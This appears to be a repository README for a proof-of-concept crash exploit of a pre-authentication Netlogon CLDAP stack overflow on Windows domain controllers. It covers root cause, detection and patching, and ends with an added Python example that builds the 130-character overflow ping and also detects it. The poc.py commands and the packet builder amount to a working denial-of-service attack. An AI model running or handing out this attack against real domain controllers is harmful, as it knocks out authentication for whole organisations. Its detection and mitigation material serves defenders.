Repository `0xABCD01/CVE-2026-41089` (Python, MIT License, default branch `main`). Topics: buffer-overflow, cldap, cve, cve-2026-41089, exploit, poc, vulnerability, vulnerability-detection, windows, windows-server.

# CVE-2026-41089

```
 ██████╗██╗   ██╗███████╗    ██╗  ██╗ ██╗ ██████╗  ██████╗
██╔════╝██║   ██║██╔════╝    ██║  ██║███║██╔═████╗██╔═████╗
██║     ██║   ██║█████╗      ███████║╚██║██║██╔██║██║██╔██║
██║     ╚██╗ ██╔╝██╔══╝      ██╔══██║ ██║████╔╝██║████╔╝██║
╚██████╗ ╚████╔╝ ███████╗    ██║  ██║ ██║╚██████╔╝╚██████╔╝
 ╚═════╝  ╚═══╝  ╚══════╝    ╚═╝  ╚═╝ ╚═╝ ╚═════╝  ╚═════╝
```

**Windows Netlogon Remote Code Execution via CLDAP Stack Buffer Overflow**

![CVSS](https://img.shields.io/badge/CVSS_3.1-9.8_CRITICAL-red?style=for-the-badge)
![CWE](https://img.shields.io/badge/CWE-121-orange?style=for-the-badge)
![Python](https://img.shields.io/badge/Python-3.8+-blue?style=for-the-badge&logo=python&logoColor=white)
![License](https://img.shields.io/badge/License-MIT-green?style=for-the-badge)

---

One crafted UDP datagram to port 389 overflows a 528-byte stack buffer
inside LSASS on any unpatched Windows Domain Controller. LSASS is a
critical process, so Windows forces a reboot about 60 seconds after the
crash. No authentication is required.

| | |
|---|---|
| **Attack Vector** | UDP 389 (CLDAP), pre-auth, zero credentials |
| **Impact** | LSASS crash, DC reboot, potential RCE |
| **CWE** | CWE-121 (Stack-based Buffer Overflow) |
| **CVSS Vector** | `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` |
| **Published** | May 12, 2026 by Microsoft |

---

## Quick Start

```
python3 poc.py 10.0.50.21 corp.local
```

Three phases: a normal CLDAP ping to confirm the DC is alive, an
overflow ping with a 130-character username, then a liveness check.
The whole run takes about 10 seconds.

## Affected Systems

Every Windows Server version running as a Domain Controller is affected.
Fixed OS builds:

| Server Version     | Fixed in (OS build)      |
|--------------------|--------------------------|
| 2012 / 2012 R2     | ESU-only patches         |
| 2016               | 10.0.14393.9140          |
| 2019               | 10.0.17763.8755          |
| 2022               | 10.0.20348.5074          |
| 2022 23H2          | 10.0.25398.2330          |
| 2025               | 10.0.26100.32772         |

## Root Cause

`NlGetLocalPingResponse` allocates a 528-byte stack buffer and hands it
to `BuildSamLogonResponse`. That function calls `NetpLogonPutUnicodeString`
to serialize the server name, domain name, GUIDs, and the
attacker-controlled username into the buffer.

The bug: `NetpLogonPutUnicodeString` receives a maximum length in bytes
but treats it as a WCHAR count, so the bound it enforces is twice as
large as the caller intended and every string written through this path
may consume up to twice the space budgeted for it. The `User` value from
the CLDAP filter, up to 130 characters (260 bytes once stored as UTF-16),
is the attacker-controlled string that pushes the combined write past the
528-byte boundary.

```
I_NetLogonLdapLookupEx
  -> NlGetLocalPingResponse           // 528-byte stack buffer
    -> LogonRequestHandler
      -> BuildSamLogonResponse
        -> NetpLogonPutUnicodeString   // byte/WCHAR size confusion
```

## Usage

```
python3 poc.py <target_ip> <domain_name> [options]
```

| Flag | Description | Default |
|------|-------------|---------|
| `-l` | Username length in characters | 130 |
| `-t` | UDP recv timeout (seconds) | 5 |
| `-d` | Delay between overflow and liveness check (seconds) | 3 |

```bash
# Connectivity test only: a short username that cannot overflow
python3 poc.py 10.0.50.21 corp.local -l 8

# Default overflow attempt (130-character username, the same as omitting -l)
python3 poc.py 10.0.50.21 corp.local -l 130

# Larger payload, longer timeout for slow networks
python3 poc.py 10.0.50.21 corp.local -l 200 -t 10
```

Requires Python 3.8+. No third-party packages.

## How It Works

1. **Phase 1.** A normal CLDAP ping with the username `testuser` confirms
   that the target answers on UDP 389.
2. **Phase 2.** The same packet structure, but the username is 130 or more
   characters of `A`. This pushes the serialized response data past the
   stack buffer boundary. If LSASS crashes, the recv times out. A timeout
   on its own is not proof (a firewall dropping the datagram looks the
   same), which is why phases 1 and 3 bracket the attempt.
3. **Phase 3.** After a configurable delay, a second normal ping checks
   whether the DC is still alive. No answer from a DC that responded in
   phase 1 means LSASS went down; the DC stays unreachable until it has
   finished rebooting.

The overflow triggers a denial of service (LSASS crash, DC reboot).
Turning the stack corruption into code execution is possible in theory;
this PoC does not attempt it.

## Detection

**Network.** Inspect CLDAP search requests for a `User` filter value
longer than 20-30 characters. Genuine DC locator pings carry a short
account name (pre-Windows 2000 logon names for user accounts are capped
at 20 characters), so a long value has no legitimate source.

**Host.** Watch for LSASS crashes with `netlogon.dll` as the faulting
module (Application log, Event ID 1000), followed by the forced restart
Wininit logs for a failed critical process (System log, Event ID 1015).
Enable Netlogon debug logging to capture the offending request:

```
nltest /dbflag:0x2080ffff
```

## Mitigation

- Install the May 2026 Microsoft security update.
- Restrict inbound UDP 389 to trusted subnets. Domain members rely on
  CLDAP for DC location, so filter at the perimeter and between untrusted
  segments rather than cutting member subnets off from their DCs.
- For legacy Server versions out of ESU: 0patch ships micropatches
  (a single-instruction fix, `mov edx, 0x40`, that halves the maximum
  username length).

## References

- [Microsoft Security Update Guide](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41089)
- [NVD - CVE-2026-41089](https://nvd.nist.gov/vuln/detail/CVE-2026-41089)
- [0patch Analysis and Micropatch](https://blog.0patch.com/2026/05/micropatches-released-for-windows_0304568783.html)
- [Aretiq AI Reverse Engineering](https://aretiq.ai/research/vul260513-cve-2026-41089-microsoft-windows-netlogon-buildsamlogonresponse-stack-based-buffer-overflow-rce/)
- [RFC 4511 - LDAP](https://tools.ietf.org/html/rfc4511)
- [MS-ADTS - CLDAP DC Locator](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/0de3704e-a799-4afa-b12a-3fef2f8e2e66)

---

> **Legal.** This code exists for authorized security research and
> education. Test only against systems you own or have written permission
> to test. Unauthorized access to computer systems violates the CFAA and
> equivalent laws in most jurisdictions.

**[MIT License](LICENSE)**
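The following is an added example written for this page; it is not code from the 0xABCD01/CVE-2026-41089 repository. It covers two passages above: the CLDAP ping packet the How It Works section describes (an LDAP SearchRequest to UDP 389 whose filter carries a `User` value of chosen length, encoded here in BER by hand with no third-party packages), and the network detection rule from the Detection section (parse the request, measure the `User` value, flag anything over the account-name length a real locator ping would use). Assumptions not taken from the page: the `NtVer` value 0x00000006 and the `Netlogon` attribute follow the MS-ADTS LDAP ping, the 20-character threshold is the pre-Windows 2000 logon-name limit, and the two sample packets are constructed locally so the code runs offline; nothing is sent anywhere.

```python
"""CLDAP DC-locator ping (UDP/389) as described in this README: build the SearchRequest
with a chosen "User" value, and flag captured requests whose User value is over-long.
Added example for this page, not code from the 0xABCD01/CVE-2026-41089 repository."""
import struct
from typing import List, Optional, Tuple

# ASN.1 BER tags used by an LDAP SearchRequest (RFC 4511)
TAG_SEQUENCE, TAG_INTEGER, TAG_OCTET_STRING, TAG_ENUMERATED, TAG_BOOLEAN = 0x30, 0x02, 0x04, 0x0A, 0x01
TAG_SEARCH_REQUEST = 0x63   # [APPLICATION 3], constructed
TAG_FILTER_AND = 0xA0       # Filter CHOICE [0] and, constructed
TAG_FILTER_EQUALITY = 0xA3  # Filter CHOICE [3] equalityMatch, constructed
USER_LENGTH_THRESHOLD = 20  # assumed: pre-Windows 2000 logon names are at most 20 characters

def ber_len(n: int) -> bytes:
    """Definite-form length: one byte below 128, else 0x80|count then big-endian bytes."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def tlv(tag: int, payload: bytes) -> bytes:
    return bytes([tag]) + ber_len(len(payload)) + payload

def ber_int(value: int, tag: int = TAG_INTEGER) -> bytes:
    """Non-negative INTEGER/ENUMERATED; a leading 0x00 stops the top bit reading as a sign."""
    body = value.to_bytes(max(1, (value.bit_length() + 7) // 8), "big")
    return tlv(tag, b"\x00" + body if body[0] & 0x80 else body)

def equality(attr: str, value: bytes) -> bytes:
    """equalityMatch { attributeDesc OCTET STRING, assertionValue OCTET STRING }."""
    return tlv(TAG_FILTER_EQUALITY, tlv(TAG_OCTET_STRING, attr.encode()) + tlv(TAG_OCTET_STRING, value))

def build_cldap_ping(domain: str, user: str, msg_id: int = 1) -> bytes:
    """LDAPMessage { messageID, SearchRequest { base "", scope baseObject,
    filter (&(DnsDomain=..)(NtVer=..)(User=..)), attributes [Netlogon] } }."""
    filt = tlv(TAG_FILTER_AND,
               equality("DnsDomain", domain.encode())
               + equality("NtVer", struct.pack("<I", 0x00000006))  # assumed: NT_VERSION_5 | _5EX
               + equality("User", user.encode()))                    # the attacker-controlled string
    search = tlv(TAG_SEARCH_REQUEST,
                 tlv(TAG_OCTET_STRING, b"")      # baseObject: rootDSE
                 + ber_int(0, TAG_ENUMERATED)    # scope: baseObject
                 + ber_int(0, TAG_ENUMERATED)    # derefAliases: neverDerefAliases
                 + ber_int(0) + ber_int(0)       # sizeLimit, timeLimit: unlimited
                 + tlv(TAG_BOOLEAN, b"\x00")     # typesOnly: FALSE
                 + filt
                 + tlv(TAG_SEQUENCE, tlv(TAG_OCTET_STRING, b"Netlogon")))
    return tlv(TAG_SEQUENCE, ber_int(msg_id) + search)

def ber_read(buf: bytes, pos: int) -> Tuple[int, int, int]:
    """Parse the TLV header at pos; return (tag, value_start, value_end)."""
    if pos + 1 >= len(buf):
        raise ValueError("truncated BER element")
    tag, first = buf[pos], buf[pos + 1]
    if first < 0x80:
        length, hdr = first, 2
    else:
        n = first & 0x7F
        length, hdr = int.from_bytes(buf[pos + 2:pos + 2 + n], "big"), 2 + n
    start, end = pos + hdr, pos + hdr + length
    if end > len(buf):
        raise ValueError("BER length runs past end of buffer")
    return tag, start, end

def extract_equality_matches(buf: bytes, pos: int = 0, end: Optional[int] = None) -> List[Tuple[str, bytes]]:
    """Walk every constructed element and collect (attribute, value) from each equalityMatch."""
    end = len(buf) if end is None else end
    found: List[Tuple[str, bytes]] = []
    while pos < end:
        tag, vstart, vend = ber_read(buf, pos)
        if tag == TAG_FILTER_EQUALITY:
            _, a0, a1 = ber_read(buf, vstart)   # attributeDesc
            _, v0, v1 = ber_read(buf, a1)       # assertionValue
            found.append((buf[a0:a1].decode("utf-8", "replace"), buf[v0:v1]))
        elif tag & 0x20:                        # constructed: SEQUENCE, SearchRequest, and-filter
            found.extend(extract_equality_matches(buf, vstart, vend))
        pos = vend
    return found

def user_filter_length(packet: bytes) -> int:
    """Character length of the User filter value, or -1 when the request carries none."""
    for attr, value in extract_equality_matches(packet):
        if attr.lower() == "user":
            return len(value.decode("utf-8", "replace"))
    return -1

def is_suspicious_ping(packet: bytes, threshold: int = USER_LENGTH_THRESHOLD) -> bool:
    """Network detection rule from the README: real locator pings carry a short account name."""
    return user_filter_length(packet) > threshold

# Constructed samples: a normal locator ping and the README's 130-character overflow ping.
NORMAL_PING = build_cldap_ping("corp.local", "testuser")
OVERFLOW_PING = build_cldap_ping("corp.local", "A" * 130)

if __name__ == "__main__":
    for name, pkt in (("normal", NORMAL_PING), ("overflow", OVERFLOW_PING)):
        print(f"{name}: {len(pkt)} bytes, User={user_filter_length(pkt)} chars, "
              f"suspicious={is_suspicious_ping(pkt)}")
```

The 130-character value pushes the filter, the SearchRequest and the outer LDAPMessage into BER long-form lengths (`0x81 nn`), which is why `ber_len` and `ber_read` both handle that form; a detector that only understands single-byte lengths would misparse exactly the packets it needs to catch. `extract_equality_matches` descends into any constructed element, so it finds the `User` assertion whether the filter is a bare equalityMatch or nested inside `and`/`or`, and it raises on a truncated datagram rather than silently returning -1. To feed it captured traffic, hand it the UDP payload of each datagram to port 389.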